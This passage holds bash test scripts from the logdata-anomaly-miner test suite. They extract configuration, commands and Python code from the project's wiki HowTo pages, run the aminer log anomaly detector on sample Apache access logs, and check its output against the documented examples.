NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py SEQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/SequenceDetector.py TMP_SEQ_DET=/tmp/SequenceDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) awk '/^```$/ && ++n == 2, /^```$/ && n++ == 3' < $INPUT | sed '/^```/ d' > $LOG # extract version command and compare output. (2.) #awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="sudo ${CMD#* }" #OUT1=$(sed -n '2,4p' < $OUT) #$CMD > $OUT & #PID=$! #sleep 5 #sudo pkill -x aminer.py #sudo pkill -x aminer #wait $PID #OUT2=`cat $OUT` #compareStrings "$OUT1" "$OUT2" "Failed Test in 2." #exit_code=$? # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. FILE="aminer_install.sh" awk '/^```bash$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* } -q" $CMD if [ ! -f "$FILE" ]; then echo "$FILE does not exist." exit_code=1 fi CMD=$(sed -n '2p' < $OUT) CMD="${CMD#* }" $CMD if [ ! -x "$FILE" ]; then echo "$FILE is not executable." exit_code=1 fi # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . (skipping this step) #awk '/^```bash$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" # 5.) Replace the path in the second string with the current directory and run the CMD. (skipping this step) #PWD=$(pwd) #CMD=$(echo "${CMD?/home/ubuntu/aminer?"$PWD"}" ) #$CMD # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. (skipping this step) #awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" #$CMD # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. awk '/^```bash$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* }" $CMD 2> /dev/null # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. OUT1=$(sudo cat $CFG_PATH | sed -n '1,21p') CMD=$(sudo cat $CFG_PATH | sed -n '23p') OUT1="$OUT1 $CMD" awk '/^```yaml$/ && ++n == 1, /^```$/' < logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' > $OUT sudo sed -i 's?file:///var/log/apache2/access.log?file:///home/ubuntu/access.log?g' $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 9." exit_code=$((exit_code | $?)) sudo sed -i 's?file:///home/ubuntu/access.log?file:///tmp/access.log?g' $CFG_PATH # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. awk '/^```bash$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 11.) Compare the outputs (replace lines with timestamps and dates). OUT1=$(sed -n '2,44p' < $OUT) OUT2=$(sed -n '46,98p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '100,131p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '2,44p' < $OUT) OUT3=$(sed -n '46,98p' < $OUT) OUT2="$OUT2 $OUT3" OUT3=$(sed -n '100,131p' < $OUT) OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. awk '/^```yaml/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 < $OUT) OUT1=$(head -n 17 < $CFG_PATH) OUT2=$(tail -n 5 < $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 14." echo exit_code=1 fi # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) CNT=$(grep -o "Detector template received a log atom!" $OUT | wc -l) if [ $CNT != 8 ]; then echo "Failed Test in 17. $CNT != 8" echo exit_code=1 fi # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "34,36d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 27 < $OUT) awk '/^```$/ && ++n == 25, /^```$/ && n++ == 26' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 28, /^```$/ && n++ == 29' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 21." exit_code=$((exit_code | $?)) # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. OUT1=$(head -n 18 $CFG_PATH) awk '/^```yaml/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) OUT2=$(tail -n 5 $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 32, /^```$/ && n++ == 33' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 24." exit_code=$((exit_code | $?)) # 25.) Add code between 34th and 35th ``` in the __init__ method. awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT | sed '/^```/ d' > $OUT IN1=$(head -n 1 $OUT) sed -i "30 i \ $IN1" $TMP_SEQ_DET IN1=$(tail -n 1 $OUT) sed -i "31 i \ $IN1" $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "82d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 7 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 6 < $OUT) awk '/^```$/ && ++n == 37, /^```$/ && n++ == 38' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 27." exit_code=$((exit_code | $?)) # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. echo "192.168.10.190 - - [29/Feb/2020:14:10:35 +0000] \"GET /services/portal/ HTTP/1.1\" 200 4345 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:45 +0000] \"GET /kronolith/ HTTP/1.1\" 200 3452 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:54 +0000] \"GET /nag/ HTTP/1.1\" 200 25623 \"-\" \"-\"" >> $LOG # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 15 < $OUT) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` awk '/^```$/ && ++n == 43, /^```$/ && n++ == 44' < $INPUT | sed '/^```/ d' > $OUT OUT3=`cat $OUT` OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 30." exit_code=$((exit_code | $?)) # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "89,94d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 32.) Compare the output with the json between 1st ```json and 46th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 40 $OUT) echo "$OUT1" > $OUT OUT1=$(tail -n 3 $OUT) OUT2=$(head -n 36 $OUT) OUT1="$OUT2 $OUT1" awk '/^```json/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT OUT2=$(tail -n 40 $OUT) echo "$OUT2" > $OUT OUT2=$(tail -n 3 $OUT) OUT3=$(head -n 36 $OUT) OUT2="$OUT3 $OUT2" compareStrings "$OUT1" "$OUT2" "Failed Test in 32." exit_code=$((exit_code | $?)) # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. sed -i -e "55,57d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. awk '/^```bash$/ && ++n == 15, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" OUT1=$(sed -n '2p' < $OUT) $CMD > $OUT IN1=`cat $OUT` # not working, because sets have no real order. #compareStrings "$OUT1" "$IN1" "Failed Test in 34." #exit_code=$((exit_code | $?)) # reset schema to backup. sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_SEQ_DET sudo rm $SEQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki sudo rm aminer_install.sh exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToEntropyDetector.sh000077500000000000000000000130551500476301700262040ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Extract the lines between 1st ```yaml and 3rd ``` and store it in CFG_PATH. # 2.) Replace LogResourceList path with LOG1 in CFG_PATH and the report interval of the ParserCount. # 3.) Parse the aminer CMD between 4th and 5th ```, replace the CFG_PATH and run it. # 4.) Compare the first two anomalies with the output between 6th and 7th ``` (without the timestamps) # 5.) Compare the last anomaly with the output between 8th and 9th ``` (without the timestamps) # 6.) Parse the cat CMD in the first line between 10th and 11th ```, run it and compare the result with the second line. # 7.) Extract the lines between 2nd ```yaml and 12th ``` and store it in CFG_PATH. # 8.) Replace LogResourceList path with LOG2 in CFG_PATH. # 9.) Parse the aminer CMD between 13th and 14th ```, replace the CFG_PATH and run it. # 10.) Compare the results of the command with the outputs between 13th and 14th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-EntropyDetector.md OUT=/tmp/out.txt LOG1=/tmp/entropy_train.log LOG2=/tmp/entropy_test.log CFG_PATH=/tmp/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cp files/entropy_train.log $LOG1 cp files/entropy_test.log $LOG2 cd .. # extract config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (2.) sed "s?file:///home/ubuntu/entropy/entropy_train.log?file:///${LOG1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (4.) IN=$(awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 && $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 77 && $i -ne 100 && $i -ne 102 && $i -ne 129 && $i -ne 131 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 134 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 4." cat "$TMPFILE1" echo echo cat "$TMPFILE2" fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # compare last result (5.) IN=$(awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 2154 && $i -ne 2177 && $i -ne 2179 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 2183 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 5." cat "$TMPFILE1" echo echo cat "$TMPFILE2" exit_code=1 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # parse cat CMD, run it and compare to the second line (6.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT="$(eval sudo $CMD)" IN="$(tail -n 1 $OUT)" compareStrings "$OUTPUT" "$IN" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract second config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (8.) sed "s?file:///home/ubuntu/demo-detectors/entropy/entropy_test.log?file:///${LOG2}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (9.) awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config_test.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(head -n 29 $OUT) # skipping ParserCount output from runAminerUntilEndTest. # compare results (10.) awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT IN="$(tail -n +2 $OUT)" i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 10." cat $TMPFILE1 echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $OUT rm $LOG1 rm $LOG2 rm $TMPFILE1 rm $TMPFILE2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToMissingMatchPathValueDetector.sh000077500000000000000000000212041500476301700307370ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # NOTE: not all outputs were compared! If one output fails all other outputs should be corrected as well! # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write the config to CFG_PATH from 1st ```yaml to 1st ```. # 2.) Replace LogResourceList path with LOG in CFG_PATH. Lower the check_interval and realert_interval to proper values. # 3.) Write log lines from 4th to 5th ``` into LOG and LOG_ALICE and LOG_BOB. # 4.) Extract the first aminer command between 6th and 7th ```, replace the CFG_PATH and run it. # 5.) Compare the result with the output between 6th and 7th ```. # 6.) Extract the CMD between 8th and 9th ```, run it and compare the results to the output. # 7.) Extract the CMD between 10th and 11th ```, run it and compare the results to the output. # 8.) Set LearnMode: False in CFG_PATH # 9.) Extract the second aminer command between 16th and 17th ``` and run it in background. # 10.) Write LOG_ALICE and LOG_BOB to LOG simultaneously, wait for WAIT_TIME. Repeat 5 times. # 11.) Compare the results with the outputs between between 20th and 21st ```. # 12.) Write LOG_BOB to LOG and wait until realert_interval is over and compare the results with the outputs between between 24th and 25th ```. # 13.) Extract the CMD between 35th and 36th ```, run it and compare the results to the output. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-MissingMatchPathValueDetector.md OUT=/tmp/out.txt OUT_AMINER=/tmp/aminer_output.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sudo rm -rf /var/lib/aminer/* exit_code=0 # write config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # adapt config (2.) sed "s?file:///var/log/apache2/access.log?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null echo "Core.PersistencePeriod: 1" | sudo tee -a $CFG_PATH > /dev/null # write log lines (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT LOG_ALICE="$(sed -n '2p' < $OUT)" LOG_BOB="${LOG_ALICE/alice/bob}" echo "$LOG_ALICE" > $LOG # extract and run aminer command (4.) awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD=${CMD#*$ } OLD_CFG_PATH=/${CMD#*/} AMINER_CMD="${CMD/"$OLD_CFG_PATH"/"$CFG_PATH"}" runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" PID=$! # compare results (5.) IN=$(tail -n +2 $OUT) OUTPUT=$(tail -n +2 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 5." exit_code=$((exit_code | $?)) # extract and run CMD and compare output (6.) awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract and run CMD and compare output (7.) #awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT #CMD="$(sed -n '1p' < $OUT)" #IFS='$' read -ra ADDR <<< "$CMD" #CMD="${ADDR[1]}" #OUTPUT=$($CMD) #IN="$(sed -n '2p' < $OUT)" #compareStrings "$IN" "$OUTPUT" "Failed Test in 7." #exit_code=$((exit_code | $?)) # set LearnMode False (8.) sed "s/LearnMode: True/LearnMode: False/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # run aminer CMD (9.) rm $LOG # write log lines (10.) cat < $LOG ::1 - - [18/Jul/2020:20:28:01 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:02 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:03 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:04 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:05 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:06 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:07 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:08 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:09 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:10 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:11 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:12 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:13 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" "not exit aminer" PID=$! # compare results (11.) awk '/^```$/ && ++n == 20, /^```$/ && n++ == 21' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(cat $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 11." exit_code=$((exit_code | $?)) # add data and compare results (12.) cat < $LOG ::1 - - [18/Jul/2020:20:28:14 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:15 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:16 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:17 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:18 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:19 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:20 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:21 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:22 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:23 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:24 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:25 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:26 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:27 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:28 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:29 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:30 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:31 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:32 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:33 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:34 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:35 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:36 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:37 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:38 +0000] "GET / 